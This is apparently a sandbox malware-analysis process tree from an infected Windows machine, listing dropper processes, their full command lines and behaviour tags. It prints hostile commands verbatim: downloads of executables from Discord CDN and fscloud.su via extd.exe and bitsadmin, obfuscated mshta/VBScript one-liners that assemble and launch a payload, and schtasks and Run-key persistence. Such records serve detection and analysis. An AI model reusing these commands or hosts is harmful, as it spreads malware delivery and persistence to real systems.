C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵PID:3152
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive & exit13⤵PID:6740
-
C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive14⤵PID:6836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exeC:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5480 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\ EXE_CMD_LINE="/forcecleanup /wintime 1635547516 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:4084
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe & exit13⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exeC:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe14⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe"C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe" -u15⤵PID:6536
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive & exit13⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive14⤵PID:6788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcteryst.jxt\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
PID:5960
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7356
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe"C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe"7⤵PID:5368
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\demimondaines.vbs"8⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq9⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:7040 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"11⤵PID:5912
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe"C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe"7⤵
- Executes dropped EXE
PID:5420 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\8F2E.bat "C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe""8⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵PID:6348
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""9⤵PID:8072
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\1169\Transmissibility.exeTransmissibility.exe9⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵PID:5012
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe"C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5352
-
-
C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe"C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe"7⤵PID:5896
-
-
C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe"C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5764
-
-
C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"7⤵PID:5536
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵PID:6944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" ) do taskkill -im "%~NxK" -F9⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵PID:1500
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵PID:4592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵PID:5792
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵PID:6776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵PID:6152
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:5192
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
PID:3272
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "6GLTtvyB0S9ougfOh2CXRyih.exe" -F10⤵
- Kills process with taskkill
PID:5592
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe5⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe6⤵
- Executes dropped EXE
PID:2724
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in Drivers directory
PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe5⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe6⤵
- Executes dropped EXE
- Checks computer location settings
PID:884 -
C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe"C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe"7⤵
- Executes dropped EXE
PID:4700
-
-
C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe"C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe"7⤵PID:5824
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7224
-
-
C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe"C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe"8⤵
- Checks computer location settings
PID:7188 -
C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"9⤵PID:3496
-
-
C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"9⤵PID:984
-
-
C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"9⤵PID:6996
-
-
C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"9⤵PID:5124
-
-
C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"9⤵PID:6600
-
-
C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"9⤵PID:7204
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:7356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:4596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵PID:7360
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵PID:4176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:7876
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵PID:5820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:7740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:5164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵PID:7400
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
- Loads dropped DLL
PID:7832
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"12⤵
- Kills process with taskkill
PID:7208
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"9⤵PID:7444
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u10⤵PID:7724
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"9⤵PID:6368
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5536 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵PID:9024
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x54,0x60,0x19c,0x1b8,0x1d4,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee012⤵PID:8660
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff7855c9e70,0x7ff7855c9e80,0x7ff7855c9e9013⤵PID:8736
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,6480581147440966869,9115839833656413535,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9024_1598510187" --mojo-platform-channel-handle=1660 /prefetch:812⤵PID:9064
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"9⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp"C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$302DA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"10⤵
- Loads dropped DLL
PID:888 -
C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe" /S /UID=270911⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe"C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe"12⤵PID:8004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive & exit13⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive14⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exeC:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654"14⤵PID:7360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe & exit13⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exeC:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe14⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe"C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe" -u15⤵
- Executes dropped EXE
PID:5208
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive & exit13⤵PID:396
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive14⤵PID:7404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S & exit13⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:8612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:1436
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:5356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:8356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:5644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:2056
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:7020
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:7352
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:6816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:6672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:7652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4628
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4628" "1600" "2256" "2204" "0" "0" "2308" "0" "0" "0" "0" "0"16⤵PID:4860
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:7928
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd15⤵PID:5068
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd16⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4880
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4208
-
-
